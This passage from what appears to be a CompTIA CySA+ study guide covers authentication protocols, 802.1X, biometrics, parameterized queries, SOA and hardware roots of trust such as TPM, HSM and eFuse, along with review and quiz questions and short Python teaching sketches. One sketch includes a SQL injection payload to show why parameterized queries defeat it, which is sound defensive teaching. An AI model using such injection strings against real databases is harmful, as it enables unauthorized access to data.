variety of EAP implementations can use all sorts of authentication
mechanisms, including certificates, a public key infrastructure
(PKI), and even simple passwords:
EAP-MD5-CHAP: This variant of EAP uses the CHAP
challenge process, but the challenges and responses are sent as
EAP messages. It allows the use of passwords.
EAP-TLS: This form of EAP requires a PKI because it requires
certificates on both the server and clients. It is, however,
immune to password-based attacks as it does not use passwords.
EAP-TTLS: This form of EAP requires a certificate on the server
only. The client uses a password, but the password is sent within
a protected EAP message. It is, however, susceptible to
password-based attacks.
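Here is the sketch referenced in the CHAP description: a minimal Python illustration of the challenge-response computation (RFC 1994 defines the response as an MD5 digest over the identifier, the shared secret, and the challenge). It is a teaching aid, not a protocol implementation:

# Minimal CHAP challenge-response sketch (RFC 1994 style).
import hashlib, os

secret = b"shared-password"         # known to both ends, never transmitted

# Server: send a random challenge plus an identifier byte.
identifier, challenge = b"\x01", os.urandom(16)

# Client: hash identifier + secret + challenge and return the digest.
response = hashlib.md5(identifier + secret + challenge).digest()

# Server: recompute with its stored secret and compare the results.
expected = hashlib.md5(identifier + secret + challenge).digest()
print("authenticated" if response == expected else "rejected")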
Table 9-3 compares the authentication protocols described
here.
Table 9-3 Authentication Protocols
Protocol: PAP
Advantages: Simplicity
Disadvantages: Password sent in cleartext
Guidelines/Notes: Do not use

Protocol: CHAP
Advantages: No passwords are exchanged; widely supported standard
Disadvantages: Susceptible to dictionary and brute-force attacks
Guidelines/Notes: Ensure complex passwords

Protocol: MS-CHAP v1
Advantages: No passwords are exchanged; stronger password storage than CHAP
Disadvantages: Susceptible to dictionary and brute-force attacks; supported only on Microsoft devices
Guidelines/Notes: Ensure complex passwords; if possible, use MS-CHAP v2 instead

Protocol: MS-CHAP v2
Advantages: No passwords are exchanged; stronger password storage than CHAP; mutual authentication
Disadvantages: Susceptible to dictionary and brute-force attacks; supported only on Microsoft devices; not supported on some legacy Microsoft clients
Guidelines/Notes: Ensure complex passwords

Protocol: EAP-MD5-CHAP
Advantages: Supports password-based authentication; widely supported standard
Disadvantages: Susceptible to dictionary and brute-force attacks
Guidelines/Notes: Ensure complex passwords

Protocol: EAP-TLS
Advantages: The most secure form of EAP; uses certificates on the server and client
Disadvantages: Requires a PKI; more complex to configure
Guidelines/Notes: No known issues

Protocol: EAP-TTLS
Advantages: Widely supported standard; as secure as EAP-TLS; only requires a certificate on the server; allows passwords on the client
Disadvantages: Susceptible to dictionary and brute-force attacks; more complex to configure
Guidelines/Notes: Ensure complex passwords
IEEE 802.1X
IEEE 802.1X is a standard that defines a framework for
centralized port-based authentication. It can be applied to both
wireless and wired networks and uses three components:
Supplicant: The user or device requesting access to the network
Authenticator: The device through which the supplicant is
attempting to access the network
Authentication server: The centralized device that performs
authentication
The role of the authenticator can be performed by a wide variety
of network access devices, including remote-access servers
(both dial-up and VPN), switches, and wireless access points.
The role of the authentication server can be performed by a
Remote Authentication Dial-in User Service (RADIUS) or
Terminal Access Controller Access-Control System Plus
(TACACS+) server. The authenticator requests credentials from
the supplicant and, upon receiving those credentials, relays
them to the authentication server, where they are validated.
Upon successful verification, the authenticator is notified to
open the port for the supplicant to allow network access. This
process is illustrated in Figure 9-11.
Figure 9-11 IEEE 802.1X
While RADIUS and TACACS+ perform the same roles, they
have different characteristics. These differences must be
considered in the choice of a method. Keep in mind also that
while RADIUS is a standard, TACACS+ is Cisco proprietary.
Table 9-4 compares them.
Table 9-4 RADIUS and TACACS+

Transport Protocol: RADIUS uses UDP, which may result in faster
response; TACACS+ uses TCP, which offers more information for
troubleshooting.
Confidentiality: RADIUS encrypts only the password in the
access-request packet; TACACS+ encrypts the entire body of the
packet but leaves a standard TACACS+ header for troubleshooting.
Authentication and Authorization: RADIUS combines authentication
and authorization; TACACS+ separates authentication, authorization,
and accounting processes.
Supported Layer 3 Protocols: RADIUS does not support NetBIOS Frame
Protocol Control protocol or X.25 PAD connections; TACACS+ supports
all protocols.
Devices: RADIUS does not support securing the available commands on
routers and switches; TACACS+ supports securing the available
commands on routers and switches.
Traffic: RADIUS creates less traffic; TACACS+ creates more traffic.
Biometric Considerations
When considering biometric technologies, security
professionals should understand the following terms:
Enrollment time: The time required to obtain the sample that is
used by the biometric system. Enrollment requires actions that
must be repeated several times.
Feature extraction: The approach to obtaining biometric
information from a collected sample of a user’s physiological or
behavioral characteristics.
Accuracy: The most important characteristic of biometric systems;
it measures how correct the overall readings will be.
Throughput rate: The rate at which the biometric system can
scan characteristics and complete the analysis to permit or deny
access. The acceptable rate is 6–10 subjects per minute. A single
user should be able to complete the process in 5–10 seconds.
Acceptability: Describes the likelihood that users will accept and
follow the system.
False rejection rate (FRR): A measurement of the percentage of
valid users that will be falsely rejected by the system. This is called a
Type I error.
False acceptance rate (FAR): A measurement of the percentage
of invalid users that will be falsely accepted by the system. This is
called a Type II error. Type II errors are more dangerous than Type
I errors.
Crossover error rate (CER): The point at which FRR equals
FAR. Expressed as a percentage, this is the most important metric.
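To make FRR, FAR, and CER concrete, the following hedged Python sketch sweeps a match-score threshold over hypothetical genuine and impostor scores and reports the threshold where the two error rates cross:

# Hedged sketch: locate the approximate CER from hypothetical scores.
genuine  = [0.91, 0.85, 0.78, 0.88, 0.70, 0.95]   # valid users' scores
impostor = [0.40, 0.62, 0.55, 0.30, 0.72, 0.48]   # invalid users' scores

best = None
for t in [x / 100 for x in range(0, 101)]:
    frr = sum(s < t for s in genuine) / len(genuine)     # Type I errors
    far = sum(s >= t for s in impostor) / len(impostor)  # Type II errors
    if best is None or abs(frr - far) < abs(best[1] - best[2]):
        best = (t, frr, far)

t, frr, far = best
print(f"CER near threshold {t:.2f}: FRR={frr:.2%}, FAR={far:.2%}")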
When analyzing biometric systems, security professionals often
refer to a Zephyr chart that illustrates the comparative strengths
and weaknesses of biometric systems. However, you should also
consider how effective each biometric system is and its level of
user acceptance. The following is a list of the more popular
biometric methods ranked by effectiveness, with the most
effective being first:
1. Iris scan
2. Retina scan
3. Fingerprint
4. Hand print
5. Hand geometry
6. Voice pattern
7. Keystroke pattern
8. Signature dynamics
The following is a list of the more popular biometric methods
ranked by user acceptance, with the methods that are ranked
more popular by users being first:
1. Voice pattern
2. Keystroke pattern
3. Signature dynamics
4. Hand geometry
5. Hand print
6. Fingerprint
7. Iris scan
8. Retina scan
When considering FAR, FRR, and CER, smaller values are
better. FAR errors are more dangerous than FRR errors.
Security professionals can use the CER for comparative analysis
when helping their organization decide which system to
implement. For example, voice print systems usually have
higher CERs than iris scans, hand geometry, or fingerprints.
Figure 9-12 shows the biometric enrollment and authentication
process.
Figure 9-12 Biometric Enrollment and Authentication
Process
Certificate-Based Authentication
The security of an authentication system can be raised
significantly if the system is certificate based rather than
password or PIN based. A digital certificate provides an entity—
usually a user—with the credentials to prove its identity and
associates that identity with a public key. At minimum, a digital
certificate must provide the serial number, the issuer, the
subject (owner), and the public key.
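As an illustration, the following sketch reads those minimum fields using the third-party cryptography package (pip install cryptography); the certificate file name is hypothetical:

# Sketch of inspecting the minimum certificate fields named above.
from cryptography import x509

pem = open("user_cert.pem", "rb").read()   # hypothetical certificate file
cert = x509.load_pem_x509_certificate(pem)

print("serial number:", cert.serial_number)
print("issuer:       ", cert.issuer.rfc4514_string())
print("subject:      ", cert.subject.rfc4514_string())
print("public key:   ", cert.public_key())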
Using certificate-based authentication requires the deployment
of a public key infrastructure (PKI). PKIs include systems,
software, and communication protocols that distribute, manage,
and control public key cryptography. A PKI publishes digital
certificates. Because a PKI establishes trust within an
environment, a PKI can certify that a public key is tied to an
entity and verify that a public key is valid. Public keys are
published through digital certificates.
In some situations, it may be necessary to trust another
organization’s certificates or vice versa. Cross-certification
establishes trust relationships between certificate authorities so
that the participating CAs can rely on the other participants’
digital certificates and public keys. It enables users to validate
each other’s certificates when they are actually certified under
different certification hierarchies. A CA for one organization can
validate digital certificates from another organization’s CA when
a cross-certification trust relationship exists.
Data Protection
At this point, the criticality of protecting sensitive data
transferred by software should be quite clear. Sensitive data in
this context includes usernames, passwords, encryption keys,
and paths that applications need to function but that would
cause harm if discovered. Determining the proper method of
securing this information is critical and not easy. In the case of
passwords, a generally accepted rule is to not hard-code
passwords (although this was not always the case), because
hard-coded credentials are difficult to change and easy to
discover. When passwords must be included in application code,
they should be protected using encryption, which makes them
difficult to reverse or discover.
Parameterized Queries
There are two types of queries, parameterized and
nonparameterized. The difference between the two is that
parameterized queries require input values or parameters
and nonparameterized queries do not. The most important
reason to use parameterized queries is to avoid SQL injection
attacks. The following are some guidelines:
Use parameterized queries in ASP.NET and prepared statements in
Java to perform escaping of dangerous characters before the SQL
statement is passed to the database.
To prevent command injection attacks in SQL queries, use
parameterized APIs (or manually quote the strings if parameterized
APIs are unavailable).
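The following minimal sketch uses Python's standard-library sqlite3 module to contrast the two query types and show why the parameterized form defeats an injection attempt:

# Parameterized vs. nonparameterized queries with sqlite3.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

user_input = "alice' OR '1'='1"   # classic injection payload

# Unsafe: input concatenated into the statement is parsed as SQL.
unsafe = "SELECT role FROM users WHERE name = '" + user_input + "'"
print(conn.execute(unsafe).fetchall())               # row returned: injected

# Safe: the ? placeholder passes the value as data, never as SQL.
safe = "SELECT role FROM users WHERE name = ?"
print(conn.execute(safe, (user_input,)).fetchall())  # [] -- no injection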
STATIC ANALYSIS TOOLS
Static analysis refers to testing or examining software when
it is not running. The most common type of static analysis is
code review. Code review is the systematic investigation of the
code for security and functional problems. It can take many
forms, from simple peer review to formal code review. Code
review was covered earlier in this chapter. Static analysis was
covered in more depth in Chapter 4.
DYNAMIC ANALYSIS TOOLS
Dynamic analysis is testing performed on software while it
is running. This testing can be performed manually or by using
automated testing tools. There are two general approaches to
dynamic analysis, which were covered in Chapter 4 but are
worth reviewing:
Synthetic transaction monitoring: A type of proactive
monitoring, often preferred for websites and applications. It
provides insight into the application’s availability and performance,
warning of any potential issue before users experience any
degradation in application behavior. It uses external agents to run
scripted transactions against an application. For example,
Microsoft’s System Center Operations Manager (SCOM) uses
synthetic transactions to monitor databases, websites, and TCP port
usage (see the sketch after this list).
Real user monitoring (RUM): A type of passive monitoring that
captures and analyzes every transaction of every application or
website user. Unlike synthetic monitoring, which attempts to gain
performance insights by regularly testing synthetic interactions,
RUM cuts through the guesswork by analyzing exactly how your
users are interacting with the application.
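Here is the sketch referenced above: a hedged Python illustration of a single synthetic transaction, assuming a hypothetical monitored URL and latency threshold. In practice an external agent would run this on a schedule:

# Hedged synthetic-transaction sketch; URL and threshold are illustrative.
import time
from urllib.request import urlopen

URL = "https://example.com/health"   # hypothetical monitored endpoint
THRESHOLD = 2.0                      # seconds considered acceptable

def probe() -> None:
    start = time.monotonic()
    try:
        status = urlopen(URL, timeout=10).status
        elapsed = time.monotonic() - start
        if status != 200 or elapsed > THRESHOLD:
            print(f"WARN: status={status} latency={elapsed:.2f}s")
        else:
            print(f"OK: {elapsed:.2f}s")
    except Exception as exc:
        print(f"ALERT: transaction failed: {exc}")

probe()  # a scheduler would repeat this, e.g., every minute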
FORMAL METHODS FOR VERIFICATION
OF CRITICAL SOFTWARE
Formal code review is an extremely thorough, line-by-line
inspection, usually performed by multiple participants using
multiple phases. This is the most time-consuming type of code
review but the most effective at finding defects.
Formal methods can be used at a number of levels:
Level 0: Formal specification may be undertaken and then a
program developed from this informally. This is the least formal
method and the least expensive to undertake.
Level 1: Formal development and formal verification may be used
to produce a program in a more formal manner. For example,
proofs of properties or refinement from the specification to a
program may be undertaken. This may be most appropriate in high-integrity systems involving safety or security.
Level 2: Theorem provers may be used to undertake fully formal
machine-checked proofs. This can be very expensive and is only
practically worthwhile if the cost of mistakes is extremely high (e.g.,
in critical parts of microprocessor design).
SERVICE-ORIENTED ARCHITECTURE
A newer approach to providing a distributed computing model
is service-oriented architecture (SOA). It operates on the
theory of providing web-based communication functionality
without redundant code having to be written for each
application. SOA is considered a software assurance best
practice because it uses standardized interfaces and
components called service brokers to facilitate communication
among web-based applications. Let’s look at some
implementations.
Security Assertion Markup Language (SAML)
Security Assertion Markup Language (SAML) is a
security attestation model built on XML and SOAP-based
services that allows for the exchange of authentication and
authorization data between systems and supports federated
identity management. SAML is covered in depth in Chapter 8,
“Security Solutions for Infrastructure Management.”
Simple Object Access Protocol (SOAP)
Simple Object Access Protocol (SOAP) is a protocol
specification for exchanging structured information in the
implementation of web services in computer networks. The
SOAP specification defines a messaging framework that
consists of the following:
The SOAP processing model: Defines the rules for processing a
SOAP message
The SOAP extensibility model: Defines the concepts of SOAP
features and SOAP modules
The SOAP binding framework: Describes the rules for defining
a binding to an underlying protocol that can be used for exchanging
SOAP messages between SOAP nodes
The SOAP message: Defines the structure of a SOAP message
One of the disadvantages of SOAP is the verbosity of its
operation. This has led many developers to use the REST
architecture, discussed next, instead. From a security
perspective, while the SOAP body can be partially or completely
encrypted, the SOAP header is not encrypted and allows
intermediaries to view the header data.
Representational State Transfer (REST)
Representational State Transfer (REST) is a
client/server model for interacting with content on remote
systems, typically using HTTP. It involves accessing and
modifying existing content and also adding content to a system
in a particular way. REST does not require a specific message
format during HTTP resource exchanges. It is up to a RESTful
web service to choose which formats are supported. RESTful
services are services that do not violate REST’s required constraints.
XML and JavaScript Object Notation (JSON) are two of the
most popular formats used by RESTful web services.
JSON is a simple text-based message format that is often used
with RESTful web services. Like XML, it is designed to be
readable, and this can help when debugging and testing. JSON
is derived from JavaScript and, therefore, is very popular as a
data format in web applications. REST/JSON has several
advantages over SOAP/XML:
Size: REST/JSON is a lot smaller and less bloated than
SOAP/XML. Therefore, much less data is passed over the network,
which is particularly important for mobile devices.
Efficiency: REST/JSON makes it easier to parse data, thereby
making it easier to extract and convert the data. As a result, it
requires much less from the client’s CPU.
Caching: REST/JSON provides improved response times and
server loading due to support from caching.
Implementation: REST/JSON interfaces are much easier than
SOAP/XML to design and implement.
SOAP/XML is generally preferred in transactional services such
as banking services.
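The following minimal Python sketch performs a RESTful JSON exchange using only the standard library; the endpoint URL and payload are hypothetical:

# Hedged sketch of a RESTful JSON POST over HTTP.
import json
from urllib.request import Request, urlopen

url = "https://api.example.com/accounts"   # hypothetical endpoint
payload = json.dumps({"owner": "alice"}).encode("utf-8")

req = Request(url, data=payload,
              headers={"Content-Type": "application/json"},
              method="POST")
with urlopen(req, timeout=10) as resp:
    body = json.loads(resp.read())   # compact JSON: cheap to parse
print(body)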
Microservices
An SOA microservice is a self-contained piece of business
functionality with clear interfaces, not a layer in a monolithic
application. The microservices architecture is a variant of the
SOA structural style that arranges an application as a collection
of loosely coupled services. The focus is on building single-function modules with
well-defined interfaces and operations. Figure 9-13 shows the
microservices architecture in comparison with a typical
monolithic structure.
FIGURE 9-13 Microservices
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 9-5
lists a reference of these key topics and the page numbers on
which each is found.
Table 9-5 Key Topics in Chapter 9
Key Topic Element | Description | Page Number
Bulleted list | SCEP authorization mechanisms | 258
Bulleted list | Countermeasures to maintenance hooks | 260
Figure 9-2 | Cross-site request forgery | 261
Bulleted list | Countermeasures to CSRF | 261
Figure 9-3 | Click-jacking | 262
Bulleted list | NIST recommendations for hardware/embedded device analysis | 264
Figure 9-6 | Secure boot | 265
Numbered list | SDLC | 267
Numbered list | Stress testing | 272
Bulleted list | Types of regression testing | 273
Bulleted list | Types of code review | 273
Table 9-2 | Black-box, gray-box, and white-box testing comparison | 274
Numbered list | Code review process | 275
Bulleted list | Output encoding types | 276
Bulleted list | Network authentication protocols | 279
Table 9-3 | Authentication protocols comparison | 280
Bulleted list | 802.1X components | 281
Table 9-4 | RADIUS and TACACS+ comparison | 282
Bulleted list | Biometric terms | 282
Figure 9-12 | Biometric enrollment and authentication process | 284
Bulleted list | Guidelines for parameterized queries | 285
Bulleted list | Dynamic analysis approaches | 286
Bulleted list | Formal method levels for code review | 286
Bulleted list | SOAP specification framework | 287
Bulleted list | REST/JSON advantages over SOAP/XML | 288
Figure 9-13 | Microservices architecture vs. a typical monolithic structure | 289
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
corporate-owned, personally enabled (COPE)
application wrapping
remote wipes
Simple Certificate Enrollment Protocol (SCEP)
maintenance hook
time-of-check/time-of-use
cross-site request forgery (CSRF)
click-jacking
embedded
System-on-Chip (SoC)
software development life cycle (SDLC)
DevSecOps
user acceptance testing (UAT)
stress testing
security regression testing
input validation
output encoding
parameterized queries
static analysis
dynamic analysis
formal methods
service-oriented architecture (SOA)
Security Assertion Markup Language (SAML)
Simple Object Access Protocol (SOAP)
Representational State Transfer (REST)
microservice
REVIEW QUESTIONS
1. ____________________ is a strategy in which an
organization purchases mobile devices for users and users
manage those devices.
2. List at least one step in the NIST SP 800-163 Rev 1 process.
3. Match the terms on the left with their definitions on the
right.
Terms | Definitions
Maintenance hooks | Attack that causes an end user to execute unwanted actions on a web application in which the user is currently authenticated
Time-of-check/time-of-use attacks | Attack that crafts a transparent page or frame over a legitimate-looking page that entices the user to click something
Cross-site request forgery (CSRF) | Attack that attempts to take advantage of the sequence of events that occurs as the system completes common tasks
Click-jacking | A set of instructions built into the code that allows someone who knows about the so-called backdoor to use the instructions to connect to view and edit the code without using the normal access controls
4. _______________ is a client/server model for
interacting with content on remote systems, typically using
HTTP.
5. List at least two advantages of REST/JSON over SOAP/XML.
6. Match the terms on the left with their definitions on the
right.
Terms | Definitions
Embedded system | An integrated circuit that includes all components of a computer or another electronic system
SoC | Provides a predictable framework of procedures designed to identify all requirements with regard to functionality, cost, reliability, and delivery schedule and ensure that each is met in the final solution
SDLC | A computer system with a dedicated function within a larger system
DevSecOps | Development concept, emphasizing security, that grew out of the DevOps approach
7. __________________________ determines the
workload that the application can withstand.
8. List at least two forms of code review.
9. Match the terms on the left with their definitions on the
right.
Terms | Definitions
Regression testing | Also called translucent testing, as the tester has partial knowledge
Gray-box testing | Internal workings of the application are fully known
White-box testing | Internal workings of the application are not known
Black-box testing | Testing the security after a change is made to the software
10. ___________________ is a method to encode
information in a Uniform Resource Identifier.
Chapter 10
Hardware Assurance Best
Practices
This chapter covers the following topics related to Objective 2.3
(Explain hardware assurance best practices) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002 certification exam:
Hardware root of trust: Introduces the Trusted Platform
Module (TPM) and hardware security module (HSM).
eFuse: Covers the dynamic real-time reprogramming of computer
chips.
Unified Extensible Firmware Interface (UEFI): Discusses
the newer UEFI firmware interface.
Trusted foundry: Describes a program for hardware sourcing
assurance.
Secure processing: Covers Trusted Execution, secure enclave,
processor security extensions, and atomic execution.
Anti-tamper: Explores methods of preventing physical attacks.
Self-encrypting drive: Covers automatic drive protections.
Trusted firmware updates: Discusses methods for safely
acquiring firmware updates.
Measured Boot and attestation: Covers boot file protections.
Bus encryption: Describes the use of encrypted program
instructions on a data bus.
Organizations acquire hardware and services as part of day-to-day business. The supply chain for tangible property is vital to
every organization. An organization should understand all risks
for the supply chain and implement a risk management
program that is appropriate for it. This chapter discusses best
practices for ensuring that all hardware is free of security issues
out of the box.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these ten self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table
10-1 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 10-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Question
Hardware Root of Trust
1
eFuse
2
Unified Extensible Firmware Interface (UEFI)
3
Trusted Foundry
4
Secure Processing
5
Anti-Tamper
6
Self-encrypting Drive
7
Trusted Firmware Updates
8
Measured Boot and Attestation
9
Bus Encryption
10
1. Which of the following is a draft publication that gives
guidelines on hardware-rooted security in mobile devices?
1. NIST SP 800-164
2. IEEE 802.11ac
3. FIPS 120
4. IEC/IOC 270017
2. Which of the following allows for the dynamic real-time
reprogramming of computer chips?
1. TAXII
2. eFuse
3. UEFI
4. TPM
3. Which of the following is designed as a replacement for the
traditional PC BIOS?
1. TPM
2. Secure boot
3. UEFI
4. NX bit
4. Which of the following ensures that systems have access to
leading-edge integrated circuits from secure, domestic
sources?
1. DoD
2. FIPS 120
3. OWASP
4. Trusted Foundry
5. Which of the following is a part of an operating system that
cannot be compromised even when the operating system
kernel is compromised?
1. Secure enclave
2. Processor security extensions
3. Atomic execution
4. XN bit
6. Which of the following technologies can zero out sensitive
data if it detects penetration of its security and may even do
this with no power?
1. TPM
2. Anti-tamper
3. Secure enclave
4. Measured boot
7. Which of the following is used to provide transparent
encryption on self-encrypting drives?
1. DEK
2. TPM
3. UEFI
4. ENISA
8. Which of the following is the key to trusted firmware
updates?
1. Obtain firmware updates only from the vendor directly
2. Use a third-party facilitator to obtain updates
3. Disable Secure Boot
4. Follow the specific directions with the update
9. Windows Secure Boot is an example of what technology?
1. Security extensions
2. Secure enclave
3. UEFI
4. Measured boot
10. What is used by newer Microsoft operating systems to
protect certificates, BIOS, passwords, and program
authenticity?
1. Security extensions
2. Bus encryption
3. UEFI
4. Secure enclaves
FOUNDATION TOPICS
HARDWARE ROOT OF TRUST
NIST SP 800-164 is a draft Special Publication that gives
guidelines on hardware-rooted security in mobile devices. It
defines three required security components for mobile devices:
Roots of Trust (RoTs), an application programming
interface (API) to expose the RoTs to the platform, and a Policy
Enforcement Engine (PEnE).
Roots of Trust are the foundation of assurance of the
trustworthiness of a mobile device. RoTs must always behave in
an expected manner because their misbehavior cannot be
detected. Hardware RoTs are preferred over software RoTs due
to their immutability, smaller attack surfaces, and more reliable
behavior. They can provide a higher degree of assurance that
they can be relied upon to perform their trusted function or
functions. Software RoTs could provide the benefit of quick
deployment to different platforms. To support device integrity,
isolation, and protected storage, devices should implement the
following RoTs:
Root of Trust for Storage (RTS)
Root of Trust for Verification (RTV)
Root of Trust for Integrity (RTI)
Root of Trust for Reporting (RTR)
Root of Trust for Measurement (RTM)
The RoTs need to be exposed by the operating system to
applications through an open API. This provides application
developers a set of security services and capabilities they can
use to secure their applications and protect the data they
process. By providing an abstracted layer of security services
and capabilities, these APIs can reduce the burden on
application developers to implement low-level security features,
and instead allow them to reuse trusted components provided
in the RoTs and the OS. The APIs should be standardized within
a given mobile platform and, to the extent possible, across
platforms. Applications can use the APIs, and the associated
RoTs, to request device integrity reports, protect data through
encryption services provided by the RTS, and store and retrieve
authentication credentials and other sensitive data.
The PEnE enforces policies on the device with the help of other
device components and enables the processing, maintenance,
and management of policies on both the device and in the
information owners’ environments. The PEnE provides
information owners with the ability to express the control they
require over their information. The PEnE needs to be trusted to
implement the information owner’s requirements correctly and
to prevent one information owner’s requirements from
adversely affecting another’s. To perform key functions, the
PEnE needs to be able to query the device’s configuration and
state.
Mobile devices should implement the following three mobile
security capabilities to address the challenges with mobile
device security:
Device integrity: Device integrity is the absence of corruption in
the hardware, firmware, and software of a device. A mobile device
can provide evidence that it has maintained device integrity if its
software, firmware, and hardware configurations can be shown to
be in a state that is trusted by a relying party.
Isolation: Isolation prevents unintended interaction between
applications and information contexts on the same device.
Protected storage: Protected storage preserves the
confidentiality and integrity of data on the device while at rest,
while in use (in the event an unauthorized application attempts to
access an item in protected storage), and upon revocation of access.
Trusted Platform Module (TPM)
Controlling network access to devices is helpful, but in many
cases, devices such as laptops, tablets, and smartphones leave
your network, leaving behind all the measures you have taken to
protect the network. There is also a risk of these devices being
stolen or lost. For these situations, the best measure to take is
full disk encryption.
The best implementation of full disk encryption requires and
makes use of a Trusted Platform Module (TPM) chip. A
TPM chip is a security chip installed on a computer’s
motherboard that is responsible for protecting symmetric and
asymmetric keys, hashes, and digital certificates. This chip
provides services to protect passwords and encrypt drives and
digital rights, making it much harder for attackers to gain access
to the computers that have TPM chips enabled.
Two particularly popular uses of TPM are binding and sealing.
Binding actually “binds” the hard drive through encryption to a
particular computer. Because the decryption key is stored in the
TPM chip, the hard drive’s contents are available only when the
drive is connected to the original computer. But keep in mind
that all the contents are at risk if the TPM chip fails and a
backup of the key does not exist.
Sealing, on the other hand, “seals” the system state to a
particular hardware and software configuration. This prevents
attackers from making any changes to the system. However, it
can also make installing a new piece of hardware or a new
operating system much harder. The system can only boot after
the TPM chip verifies system integrity by comparing the original
computed hash value of the system’s configuration to the hash
value of its configuration at boot time.
A TPM chip consists of both static memory and versatile
memory that is used to retain the important information when
the computer is turned off:
Endorsement key (EK): The EK is persistent memory installed
by the manufacturer that contains a public/private key pair.
Storage root key (SRK): The SRK is persistent memory that
secures the keys stored in the TPM.
Attestation identity key (AIK): The AIK is versatile memory
that ensures the integrity of the EK.
Platform configuration register (PCR) hash: A PCR hash is
versatile memory that stores data hashes for the sealing function.
Storage keys: A storage key is versatile memory that contains the
keys used to encrypt the computer’s storage, including hard drives,
USB flash drives, and so on.
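The following hedged Python sketch illustrates the extend pattern a PCR uses to accumulate boot measurements (new value = hash of old value concatenated with a measurement digest); it mirrors the concept only and is not a TPM implementation:

# Hedged sketch of PCR-style hash extension.
import hashlib

def pcr_extend(pcr: bytes, measurement: bytes) -> bytes:
    # Each extend commits the register to everything measured so far,
    # in order; there is no way to "un-extend" a value.
    return hashlib.sha256(pcr + hashlib.sha256(measurement).digest()).digest()

pcr = bytes(32)  # PCRs start zeroed at reset
for component in (b"bootloader", b"kernel", b"drivers"):
    pcr = pcr_extend(pcr, component)
print(pcr.hex())  # sealing can bind secrets to this expected value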
BitLocker and BitLocker to Go by Microsoft are well-known full
disk encryption products. The former is used to encrypt hard
drives, including operating system drives, and the latter is used
to encrypt information on portable devices such as USB devices.
However, there are other options. Additional whole disk
encryption products include
PGP Whole Disk Encryption
SecurStar DriveCrypt
Sophos SafeGuard
Trend Micro Maximum Security
Virtual TPM
A virtual TPM (vTPM) chip is a software object that
performs the functions of a TPM chip. It is a system that enables
trusted computing for an unlimited number of virtual machines
on a single hardware platform. A vTPM makes secure storage
and cryptographic functions available to operating systems and
applications running in virtual machines.
Figure 10-1 shows one possible implementation of vTPM by
IBM. The TPM chip in the host system is replaced by a more
powerful vTPM (PCIXCC-vTPM). The virtual machine (VM)
named Dom-TPM is a VM whose only purpose is to proxy for
the PCIXCC-vTPM and make TPM instances available to all
other VMs running on the system.
FIGURE 10-1 vTPM Possible Solution 1
Another possible approach suggested by IBM is to run vTPMs
on each VM, as shown in Figure 10-2. In this case, the VM
named Dom-TPM talks to the physical TPM chip in the host and
maintains separate TPM instances for each VM.
Figure 10-2 vTPM Possible Solution 2
Hardware Security Module (HSM)
A hardware security module (HSM) is an appliance that
safeguards and manages digital keys used with strong
authentication and provides crypto processing. It attaches
directly to a computer or server. Among the functions of an
HSM are
Onboard secure cryptographic key generation
Onboard secure cryptographic key storage and management
Use of cryptographic and sensitive data material
Offloading of application servers for complete asymmetric and
symmetric cryptography
HSM devices can be used in a variety of scenarios, including the
following:
In a PKI environment to generate, store, and manage key pairs
In card payment systems to encrypt PINs and to load keys into
protected memory
To perform the processing for applications that use TLS/SSL
In Domain Name System Security Extensions (DNSSEC; a secure
form of DNS that protects the integrity of zone files) to store the
keys used to sign the zone file
There are some drawbacks to an HSM, including the following:
High cost
Lack of a standard for the strength of the random number generator
Difficulty in upgrading
When selecting an HSM product, you must ensure that it
provides the services needed, based on its application.
Remember that each HSM has different features and different
encryption technologies, and some HSM devices might not
support a strong enough encryption level to meet an
enterprise’s needs. Moreover, you should keep in mind the
portable nature of these devices and protect the physical
security of the area where they are connected.
MicroSD HSM
A microSD HSM is an HSM that connects to the microSD port
on a device that has such a port. The card is specifically suited
for mobile apps written for Android and is supported by most
Android phones and tablets with a microSD card slot.
Moreover, some microSD cards can be made to support various cryptographic algorithms, such as AES, RSA, SHA-1, SHA-256, and Triple DES, as well as the Diffie-Hellman key exchange. Cards with this support can provide the same protections as a dedicated microSD HSM, an advantage over ordinary microSD cards that lack it.
EFUSE
Computer logic is generally hard-coded onto a chip and cannot
be changed after the chip is manufactured. An eFuse allows for
the dynamic real-time reprogramming of computer chips.
Utilizing a set of eFuses, a chip manufacturer can allow for the
circuits on a chip to change while it is in operation.
One use is to prevent downgrading the firmware of a device.
Systems equipped with an eFuse will check the number of burnt
fuses before attempting to install new firmware. If too many
fuses are burnt (meaning the firmware to be installed is older
than the current firmware), then the bootloader will prevent
installation of the older firmware.
An eFuse can also be used to help secure a stolen device. For example, Samsung devices use an eFuse to indicate when an untrusted (non-Samsung) boot path is discovered. Once the eFuse is set (when the path is discovered), the device can no longer read the data previously stored.
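A minimal sketch of the anti-rollback logic described above follows. The fuse count and version values are hypothetical, and a real implementation runs inside the bootloader rather than in Python.

# Each burnt eFuse records one security-relevant firmware revision.
burnt_fuses = 3            # read from the eFuse bank (hypothetical value)
new_image_version = 2      # anti-rollback level carried by the new image

def allow_install(fuses, image_version):
    # Reject any image older than the level recorded in the fuses
    return image_version >= fuses

if allow_install(burnt_fuses, new_image_version):
    print("Firmware accepted")
else:
    print("Downgrade blocked by eFuse anti-rollback check")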
UNIFIED EXTENSIBLE FIRMWARE
INTERFACE (UEFI)
A computer’s BIOS contains the basic instructions that a
computer needs to boot and load the operating system from a
drive. The process of updating the BIOS with the latest software
is referred to as flashing the BIOS. Security professionals
should ensure that any BIOS updates are obtained from the
BIOS vendor and have not been tampered with in any way.
The traditional BIOS has been replaced with the Unified
Extensible Firmware Interface (UEFI). UEFI maintains
support for legacy BIOS devices, but is considered a more
